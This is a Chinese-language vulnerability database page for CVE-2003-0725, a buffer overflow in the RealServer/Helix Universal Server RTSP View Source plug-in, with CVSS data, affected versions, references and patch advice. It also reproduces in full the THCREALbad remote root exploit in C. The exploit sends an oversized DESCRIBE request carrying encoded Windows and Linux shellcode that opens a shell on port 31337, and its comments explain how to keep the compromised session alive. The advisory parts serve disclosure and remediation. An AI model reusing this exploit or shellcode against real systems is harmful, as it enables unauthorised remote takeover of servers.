CVE-2003-0725
CVSS7.5
发布时间 :2003-10-20 00:00:00
修订时间 :2008-09-05 16:35:05
NMCOES    

[原文]Buffer overflow in the RTSP protocol parser for the View Source plug-in (vsrcplin.so or vsrcplin3260.dll) for RealNetworks Helix Universal Server 9 and RealSystem Server 8, 7 and RealServer G2 allows remote attackers to execute arbitrary code.


[CNNVD]Real Networks Helix Universal Server远程缓冲区溢出漏洞(CNNVD-200310-053)

        
        Helix Universal Server是一款由RealNetWorks开发和维护的多类型媒体服务器。
        Helix Universal Server在处理'View Source'插件实现时存在问题,远程攻击者可以利用这个漏洞以服务进程权限在系统上执行任意指令。
        问题存在于Helix Universal Server的'View Source'插件上,这个插件负责读和显示媒体文件的文件格式头。当部分字符(如".")以超多数量包含在URL中,服务协议对此URL进行解析时可发生缓冲区溢出,精心构建提交上述数据可能以服务进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:realnetworks:realserver:8.0
cpe:/a:realnetworks:helix_universal_server:8.0.1
cpe:/a:realnetworks:realserver:8.0_beta
cpe:/a:realnetworks:helix_universal_server:9.0
cpe:/a:realnetworks:realserver:8.0.2
cpe:/a:realnetworks:realserver:7.0.1
cpe:/a:realnetworks:helix_universal_server:9.0.2.794
cpe:/a:realnetworks:helix_universal_server:9.0.1
cpe:/a:realnetworks:realserver:7.0.2
cpe:/a:realnetworks:realserver:7.0
cpe:/a:realnetworks:realserver:g2_1.0
cpe:/a:realnetworks:realserver:8.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0725
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0725
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-053
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/934932
(VENDOR_ADVISORY)  CERT-VN  VU#934932
http://www.securityfocus.com/bid/8476
(VENDOR_ADVISORY)  BID  8476
http://www.service.real.com/help/faq/security/rootexploit082203.html
(UNKNOWN)  CONFIRM  http://www.service.real.com/help/faq/security/rootexploit082203.html
http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html
(UNKNOWN)  MISC  http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0087.html
(VENDOR_ADVISORY)  VULNWATCH  20030825 New Bug in RealServer

- 漏洞信息

Real Networks Helix Universal Server远程缓冲区溢出漏洞
高危 边界条件错误
2003-10-20 00:00:00 2006-01-05 00:00:00
远程  
        
        Helix Universal Server是一款由RealNetWorks开发和维护的多类型媒体服务器。
        Helix Universal Server在处理'View Source'插件实现时存在问题,远程攻击者可以利用这个漏洞以服务进程权限在系统上执行任意指令。
        问题存在于Helix Universal Server的'View Source'插件上,这个插件负责读和显示媒体文件的文件格式头。当部分字符(如".")以超多数量包含在URL中,服务协议对此URL进行解析时可发生缓冲区溢出,精心构建提交上述数据可能以服务进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在软件安装的/Plugins的目录下去除插件库文件:
        UNIX/Linux平台下: vsrcplin.so.9.0 (Helix Universal Server), vsrcplin.so.6.0 (RealSystem Server 8 & 7, and RealServer G2)
        Windows平台下: vsrc3260.dll
        删除此插件不会对随选内容或实时流传递、日志记录、验证服务造成影响,但内容浏览功能将不能使用。
        厂商补丁:
        Real Networks
        -------------
        Real Networks Helix Universal Server 9.0.2.802以及更高版本修复了这一安全漏洞, 您可以在厂商主页下载最新版本:
        
        http://www.real.com

        Real Server 8.x的客户需要与Real Server客服联系获取补丁.
        更早版本的Real Server已经不再被支持.

- 漏洞信息 (86)

Real Server 7/8/9 Remote Root Exploit (Windows & Linux) (EDBID:86)
multiple remote
2003-08-25 Verified
554 Johnny Cyberpunk
N/A [点击下载]
/***************************************************************
/* THCREALbad 0.4 - Wind0wZ & Linux remote root exploit 
/* Exploit by: Johnny Cyberpunk thehackerschoice
/* THC PUBLIC SOURCE MATERIALS 
/*
/* http://www.service.real.com/help/faq/security/rootexploit082203.html
/* 
/* After successful exploitation of a Linux box just type in the following 
/* ps -ef | grep -i rmserver 
/* and then search for the first appearing master pid of rmserver and type 
/* kill -9 <master pid of rmserver> 
/* Otherwise the master process detects that the compromised thread isn't 
/* running in a stable state any longer and kicks u of the box. 
/* On Windows Realservers it doesn't matter, the connection keeps up. 
/* 
/* Also try the testing mode before exploitation of this bug, what OS is 
/* running on the remote site, to know what type of shellcode to use. 
/* 
/* Greetings go to Dave Aitel of Immunitysec who found that bug. 
/* 
/* compile with MS Visual C++ : cl THCREALbad.c 
/***************************************************************

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#define WINDOWS 0
#define LINUX 1
#define OSTESTMODE 2

#pragma comment(lib, "ws2_32.lib")

char ostestmode[] = "OPTIONS / RTSP/1.0\r\n\r\n";

char attackbuffer1[] =
"DESCRIBE /"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../";

char attackbuffer2[] =
".smi RTSP/1.0\r\n\r\n";

char decoder[] =
"\xcc\xcc\x90\x8b\xfd\x83\xc7\x37\x33\xc9\xb2\x90\x66\x81\xc1"
"\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7";

char linuxshell[] =
"\x36\xc5\x55\x6d\xfa\x07\x7f\x6c\x8c\xe2\x55\x6f\x04\x6f\x07"
"\x8c\xe4\xb5\x63\x34\xde\x46\xc8\x85\x6f\x15\x52\x55\x8c\xe4"
"\xb5\x63\x46\xc8\x85\xb5\x63\xb6\x01\x8c\x41\x21\x01\xc8\x85"
"\x36\xc5\x86\xc1\x09\x55\x55\xb5\x63\x46\xc8\x85\x8c\xc6\x34"
"\xcc\xb4\x06\x34\xc5\xb5\x3a\x4c\xc8\x85\x44\xe7\xf3\x34\xc5"
"\x55\x6d\x2a\x2a\x76\x6d\x6d\x2a\x67\x6c\x6b\x8c\xe6\x55\x56"
"\x8c\xe4\x9c\xb5\x0e\xc8\x85";

char w32shell[] =
"\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc"
"\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2"
"\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d"
"\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b"
"\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b"
"\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0"
"\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1"
"\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94"
"\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb"
"\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd"
"\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1"
"\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18"
"\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8"
"\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f"
"\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde"
"\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18"
"\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3"
"\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5"
"\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5"
"\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2"
"\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70";

void usage();

int main(int argc, char *argv[])
{ 
unsigned short realport=554;
unsigned int sock,addr,os,rc;
unsigned char *finalbuffer,*osbuf;
struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCREALbad v0.4 - Wind0wZ & Linux remote root sploit for Realservers 8+9\n");
printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");

if(argc<3 || argc>3)
usage();

finalbuffer = malloc(2000);
memset(finalbuffer,0,2000);

strcpy(finalbuffer,attackbuffer1);
os = (unsigned short)atoi(argv[2]);
switch(os)
{
case WINDOWS:
decoder[11]=0x90;
break;
case LINUX:
decoder[11]=0x05;
break;
case OSTESTMODE:
break;
default:
printf("\nillegal OS value!\n");
exit(-1);
}

strcat(finalbuffer,decoder);

if(os==WINDOWS)
strcat(finalbuffer,w32shell);
else
strcat(finalbuffer,linuxshell);

strcat(finalbuffer,attackbuffer2);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{ 
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(realport);

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
if(os==OSTESTMODE)
{
send(sock,ostestmode,sizeof(ostestmode),0);
Sleep(1000);
osbuf = malloc(2000);
memset(osbuf,0,2000);
recv(sock,osbuf,2000,0);
if(*osbuf != '\0')
for(; *osbuf != '\0';)
{
if((isascii(*osbuf) != 0) && (isprint(*osbuf) != 0))
{
if(*osbuf == '\x53' && *(osbuf + 1) == '\x65' && *(osbuf + 2) == '\x72' && *(osbuf + 3) ==
 '\x76' && *(osbuf + 4) == '\x65' && *(osbuf + 5) == '\x72')
{
osbuf += 7;
printf("\nDetected OS: ");
while(*osbuf != '\n')
printf("%c", *osbuf++);
printf("\n");
break;
}
}
osbuf++;
} 
free(osbuf);
}
else
{
send(sock,finalbuffer,2000,0);
printf("\nexploit send .... sleeping a while ....\n");
Sleep(1000);
printf("\nok ... now try to connect to port 31337 via netcat !\n");
}
}
else
printf("can't connect to realserver port!\n");

shutdown(sock,1);
closesocket(sock);
free(finalbuffer);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <Host> <OS>\n");
printf("0 = Wind0wZ\n");
printf("1 = Linux\n");
printf("2 = OS Test Mode\n");
exit(0);
}

// milw0rm.com [2003-08-25]
		

- 漏洞信息

11772
RealNetworks Helix Universal Server View Source Plug-in RTSP Parser Overflow
Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-08-22 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Real Networks Helix Universal Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 8476
Yes No
2003-08-22 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Dave Aitel of Immunity, Inc.

- 受影响的程序版本

Real Networks Real Server 8.0 Beta
Real Networks Real Server 8.0 2
Real Networks Real Server 8.0 1
Real Networks Real Server 8.0
Real Networks Real Server 7.0.2
Real Networks Real Server 7.0.1
Real Networks Real Server 7.0
Real Networks Real Server 6.0 x
Real Networks Real Server 5.0
Real Networks Helix Universal Server 9.0.2 .794
Real Networks Helix Universal Server 9.0 1
Real Networks Helix Universal Server 9.0
Real Networks Helix Universal Server 8.0 1
Real Networks GameHouse dldisplay ActiveX control 0
Real Networks Helix Universal Server 9.0.2 .802

- 不受影响的程序版本

Real Networks Helix Universal Server 9.0.2 .802

- 漏洞讨论

Real Networks has announced that a vulnerability is present in Helix Universal Server version 9 and prior that will allow for attackers to compromise servers. The vulnerability is related to the "View Source" plug-in.

Note: The announcement by RealNetworks may be related to issues reported earlier by Symantec (possibly BIDs 7020, 6454, 6458 or 6456). This has not been confirmed. If this is the case, this BID will be retired.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been developed by Johnny Cyberpunk of TheHackersChoice (www.thc.org).

An exploit (realserver_describe_linux.pm) has been released as part of the MetaSploit Framework 2.0:

- 解决方案

RealNetworks has released Helix Universal Server 9.0.2.802 to address this vulnerability. Users should contact the vendor to obtain upgrades.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站